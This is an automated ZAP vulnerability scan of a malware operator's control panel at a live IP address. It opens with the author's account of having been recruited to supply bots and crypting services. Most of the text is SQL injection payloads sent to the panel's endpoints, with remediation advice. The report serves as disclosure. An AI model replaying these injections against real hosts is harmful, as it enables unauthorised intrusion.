Scan run on Bunny Loader Malware c2c, with and without any context sql injection as well as entire panel compromisation will result from these issues. This loader is NOT stable until these are fixed. Consider all clients compromied.
For context, the url was given to me by the bunny loader administrator as I was supposed to provide bots, as well as crypt services to his clients. I quickly realized the panel was awfully coded, and tested. The results are horrible and the owner refuses to fix them, even when I offered for free. Bin is available on github report: https://github.com/opsecfreak/Bunny-Loader-ADE-Vulnerability-Report-Uncrypted-Sample/

Generated on Tue, 12 Mar 2024 02:10:09

ZAP Version: 2.14.0

Summary of Alerts

Risk Level Number of Alerts
High
19
Medium
12
Low
10
Informational
24

Alerts

Name Risk Level Number of Instances
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause High 6
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Generic comment) High 6
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) High 3
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (MySQL comment) High 7
Advanced SQL Injection - Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) High 1
Advanced SQL Injection - MySQL < 5.0 boolean-based blind - Parameter replace (original value) High 1
Advanced SQL Injection - MySQL > 5.0.11 stacked queries (comment) High 1
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind High 1
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind (SELECT) High 1
Advanced SQL Injection - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) High 1
Advanced SQL Injection - MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause High 6
Advanced SQL Injection - PostgreSQL boolean-based blind - Stacked queries High 1
External Redirect High 1
LDAP Injection High 1
NoSQL Injection - MongoDB High 10
Path Traversal High 1
SQL Injection High 60
SQL Injection - Authentication Bypass High 3
SQL Injection - SQLite High 21
Absence of Anti-CSRF Tokens Medium 6
Anti-CSRF Tokens Check Medium 3
Application Error Disclosure Medium 10
Bypassing 403 Medium 2
Content Security Policy (CSP) Header Not Set Medium 50
Directory Browsing Medium 10
HTTP Only Site Medium 8
Insecure HTTP Method - TRACE Medium 50
Missing Anti-clickjacking Header Medium 27
Relative Path Confusion Medium 1
Sub Resource Integrity Attribute Missing Medium 26
XSLT Injection Medium 45
Big Redirect Detected (Potential Sensitive Information Leak) Low 1
Cookie No HttpOnly Flag Low 7
Cookie without SameSite Attribute Low 7
Cross-Domain JavaScript Source File Inclusion Low 10
In Page Banner Information Leak Low 5
Insufficient Site Isolation Against Spectre Vulnerability Low 1
Permissions Policy Header Not Set Low 50
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) Low 27
Server Leaks Version Information via "Server" HTTP Response Header Field Low 54
X-Content-Type-Options Header Missing Low 29
Authentication Request Identified Informational 6
Cookie Slack Detector Informational 24
GET for POST Informational 7
Information Disclosure - Sensitive Information in URL Informational 4
Information Disclosure - Suspicious Comments Informational 5
Insecure HTTP Method - COPY Informational 1
Insecure HTTP Method - LOCK Informational 1
Insecure HTTP Method - MKCOL Informational 1
Insecure HTTP Method - MOVE Informational 1
Insecure HTTP Method - PROPFIND Informational 1
Insecure HTTP Method - PROPPATCH Informational 1
Insecure HTTP Method - UNLOCK Informational 1
Modern Web Application Informational 6
Non-Storable Content Informational 25
Possible Username Enumeration Informational 4
Sec-Fetch-Dest Header is Missing Informational 38
Sec-Fetch-Mode Header is Missing Informational 38
Sec-Fetch-Site Header is Missing Informational 38
Sec-Fetch-User Header is Missing Informational 44
Session Management Response Identified Informational 33
Storable and Cacheable Content Informational 30
User Agent Fuzzer Informational 98
User Controllable HTML Element Attribute (Potential XSS) Informational 4
Verification Request Identified Informational 1

Passing Rules

Name Rule Type Threshold Strength
Private IP Disclosure Passive HIGH -
Session ID in URL Rewrite Passive HIGH -
Insecure JSF ViewState Passive HIGH -
Java Serialization Object Passive MEDIUM -
Vulnerable JS Library (Powered by Retire.js) Passive HIGH -
Charset Mismatch Passive HIGH -
Cookie Without Secure Flag Passive HIGH -
Re-examine Cache-control Directives Passive HIGH -
Content-Type Header Missing Passive HIGH -
Information Disclosure - Debug Error Messages Passive HIGH -
Information Disclosure - Sensitive Information in HTTP Referrer Header Passive HIGH -
HTTP Parameter Override Passive MEDIUM -
Open Redirect Passive HIGH -
Cookie Poisoning Passive HIGH -
User Controllable Charset Passive HIGH -
WSDL File Detection Passive HIGH -
Loosely Scoped Cookie Passive HIGH -
Viewstate Passive HIGH -
Heartbleed OpenSSL Vulnerability (Indicative) Passive HIGH -
Strict-Transport-Security Header Passive HIGH -
X-Backend-Server Header Information Leak Passive HIGH -
Secure Pages Include Mixed Content Passive HIGH -
Full Path Disclosure Passive MEDIUM -
HTTP to HTTPS Insecure Transition in Form Post Passive HIGH -
HTTPS to HTTP Insecure Transition in Form Post Passive HIGH -
User Controllable JavaScript Event (XSS) Passive HIGH -
Retrieved from Cache Passive HIGH -
X-ChromeLogger-Data (XCOLD) Header Information Leak Passive HIGH -
CSP Passive HIGH -
X-Debug-Token Information Leak Passive HIGH -
Username Hash Found Passive HIGH -
X-AspNet-Version Response Header Passive HIGH -
PII Disclosure Passive HIGH -
Script Passive Scan Rules Passive HIGH -
Stats Passive Scan Rule Passive HIGH -
Example Passive Scan Rule: Denial of Service Passive MEDIUM -
An example passive scan rule which loads data from a file. Passive MEDIUM -
Base64 Disclosure Passive MEDIUM -
Timestamp Disclosure Passive HIGH -
Hash Disclosure Passive HIGH -
Cross-Domain Misconfiguration Passive HIGH -
Source Code Disclosure Passive MEDIUM -
Weak Authentication Method Passive HIGH -
Reverse Tabnabbing Passive HIGH -
Dangerous JS Functions Passive MEDIUM -

Sites

https://apis.google.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://www.gstatic.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://www.google.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://chromewebstore.googleapis.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://beacons.gcp.gvt2.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://update.googleapis.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://optimizationguide-pa.googleapis.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://content-autofill.googleapis.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://cdnjs.cloudflare.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://142.202.242.172

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://accounts.google.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

https://www.googleapis.com

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

http://142.202.242.172

HTTP Response Code Number of Responses

No Authentication Statistics Found

Parameter Name Type Flags Times Used # Values

Alert Detail

High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%27%29%29+AND+7912%3D1403+AND+%28%28%27vmhR%27+LIKE+%27vmhR
Method GET
Parameter id
Attack 54')) AND 6789=6789 AND (('gXVD' LIKE 'gXVD
Evidence
Request Header - size: 752 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%29+AND+1534%3D9087+AND+%284583%3D4583&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV) AND 4080=4080 AND (5432=5432
Evidence
Request Header - size: 754 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%22+AND+9750%3D1167+AND+%22%25%22%3D%22
Method GET
Parameter id
Attack 54%" AND 8365=8365 AND "%"="
Evidence
Request Header - size: 807 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%22+AND+4111%3D4019+AND+%22Uzoz%22%3D%22Uzoz
Method GET
Parameter id
Attack 54" AND 1752=1752 AND "VyqD"="VyqD
Evidence
Request Header - size: 743 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?query=query%27+AND+8878%3D3300
Method GET
Parameter query
Attack query' AND 4219=4219
Evidence
Request Header - size: 485 bytes.
Request Body - size: 0 bytes.
Response Header - size: 333 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter task_select
Attack 1%' AND 7527=7527 AND '%'='
Evidence
Request Header - size: 850 bytes.
Request Body - size: 180 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 6
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Generic comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query+AND+7293%3D4638--+-
Method GET
Parameter query
Attack query AND 5117=5117-- -
Evidence
Request Header - size: 490 bytes.
Request Body - size: 0 bytes.
Response Header - size: 335 bytes.
Response Body - size: 154 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%22%29+AND+3961%3D3329--+-
Method GET
Parameter query
Attack query") AND 6329=6329-- -
Evidence
Request Header - size: 486 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?query=query+AND+3439%3D5093--+-
Method GET
Parameter query
Attack query AND 5756=5756-- -
Evidence
Request Header - size: 662 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV+AND+9029%3D6759--+-&value=%271%27%3D1%27&id=54
Method GET
Parameter bot
Attack DESKTOP-95IQEEV AND 9899=9899-- -
Evidence
Request Header - size: 785 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%27%29%29+AND+6761%3D4003--+-&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter command
Attack '1'=1'')) AND 9886=9886-- -
Evidence
Request Header - size: 816 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter unit_EXEC
Attack 18.9 AND 7130=7130-- -
Evidence
Request Header - size: 850 bytes.
Request Body - size: 158 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 6
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54%27%29%29%29+AND+1524%3D6642%2516
Method GET
Parameter id
Attack 54'))) AND 3826=3826%16
Evidence
Request Header - size: 749 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27%29+AND+6750%3D6907%2516&id=54
Method GET
Parameter value
Attack '1'=1') AND 4774=4774%16
Evidence
Request Header - size: 789 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%29%29+AND+3912%3D6599%2516
Method POST
Parameter id
Attack 54%')) AND 1623=1623%16
Evidence
Request Header - size: 883 bytes.
Request Body - size: 138 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 3
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects?query=query%27+AND+9600%3D8462%23
Method GET
Parameter query
Attack query' AND 2652=2652#
Evidence
Request Header - size: 497 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--?query=query%25%27+AND+8574%3D4031%23
Method GET
Parameter query
Attack query%' AND 8547=8547#
Evidence
Request Header - size: 481 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%25%22+AND+7672%3D2978%23
Method GET
Parameter query
Attack query%" AND 1286=1286#
Evidence
Request Header - size: 283 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%29+AND+2865%3D5035%23
Method GET
Parameter query
Attack query) AND 9928=9928#
Evidence
Request Header - size: 280 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW%27+AND+9178%3D7531%23
Method POST
Parameter key
Attack EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW' AND 1570=1570#
Evidence
Request Header - size: 1,078 bytes.
Request Body - size: 129 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- - AND 1726=1726#
Evidence
Request Header - size: 850 bytes.
Request Body - size: 157 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%29%29+AND+6674%3D5309%23
Method POST
Parameter id
Attack 54')) AND 4365=4365#
Evidence
Request Header - size: 878 bytes.
Request Body - size: 138 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 7
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%25%27%3BIF%286448%3D5605%29+SELECT+6448+ELSE+DROP+FUNCTION+rLMz--&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter id
Attack 54%';IF(7722=7722) SELECT 7722 ELSE DROP FUNCTION MRvj--
Evidence
Request Header - size: 1,033 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL < 5.0 boolean-based blind - Parameter replace (original value)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=%28SELECT+%28CASE+WHEN+%287490%3D9017%29+THEN+%27+ELSE+7490*%28SELECT+7490+FROM+mysql.db%29+END%29%29
Method GET
Parameter query
Attack (SELECT (CASE WHEN (4536=4536) THEN ' ELSE 4536*(SELECT 4536 FROM mysql.db) END))
Evidence
Request Header - size: 370 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL > 5.0.11 stacked queries (comment)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- -));SELECT SLEEP(5)#
Evidence
Request Header - size: 850 bytes.
Request Body - size: 169 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter sec-ch-ua
Attack "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"")) AND SLEEP(5) AND (("PQXH"="PQXH
Evidence
Request Header - size: 779 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL >= 5.0.12 AND time-based blind (SELECT)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter params
Attack ' UNION SELECT @@version -- -) AND (SELECT * FROM (SELECT(SLEEP(5)))kgZD)
Evidence
Request Header - size: 850 bytes.
Request Body - size: 200 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi?query=query%27%29+AND+MAKE_SET%282815%3D4252%2C4252%29+AND+%28%27ueQl%27%3D%27ueQl
Method POST
Parameter query
Attack query') AND MAKE_SET(6740=6740,6078) AND ('Hgka'='Hgka
Evidence
Request Header - size: 349 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
Instances 1
Solution
Do not trust client side input, even if there is client side validation in place.

In general, type check all data on the server side.

If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'

If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.

If database Stored Procedures can be used, use them.

Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!

Do not create dynamic SQL queries using simple string concatenation.

Escape all data received from the client.

Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.

Apply the privilege of least privilege by using the least privileged database user possible.

In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.

Grant the minimum database access that is necessary for the application.
Reference https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
Tags OWASP_2021_A03
OWASP_2017_A01
CWE Id 89
WASC Id 19
Plugin Id 90018
High
Advanced SQL Injection - MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Description
A SQL injection may be possible using the attached payload
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1?query=query%22%29+RLIKE+%28SELECT+%28CASE+WHEN+%284126%3D5859%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%22YByN%22%3D%22YByN
Method GET
Parameter query
Attack query") RLIKE (SELECT (CASE WHEN (3115=3115) THEN 0x7175657279 ELSE 0x28 END)) AND ("lLCV"="lLCV
Evidence
Request Header - size: 388 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%25%27%29%29+RLIKE+%28SELECT+%28CASE+WHEN+%282121%3D7848%29+THEN+0x7175657279+ELSE+0x28+END%29%29+AND+%28%28%27%25%27%3D%27
Method GET
Parameter query
Attack query%')) RLIKE (SELECT (CASE WHEN (8694=8694) THEN 0x7175657279 ELSE 0x28 END)) AND (('%'='
Evidence
Request Header - size: 593 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter sec-ch-ua-mobile
Attack ?0') RLIKE (SELECT (CASE WHEN (8958=8958) THEN 0x3f30 ELSE 0x28 END)) AND ('IIJx' LIKE 'IIJx
Evidence
Request Header - size: 789 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1%25%27+RLIKE+%28SELECT+%28CASE+WHEN+%289656%3D7648%29+THEN+1+ELSE+0x28+END%29%29+AND+%27%25%27%3D%27&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter task_select
Attack 1%' RLIKE (SELECT (CASE WHEN (6114=6114) THEN 1 ELSE 0x28 END)) AND '%'='
Evidence
Request Header - size: 1,067 bytes.
Request Body - size: 0 bytes.
Response Header - size: 225 bytes.
Response Body - size: 560 bytes.
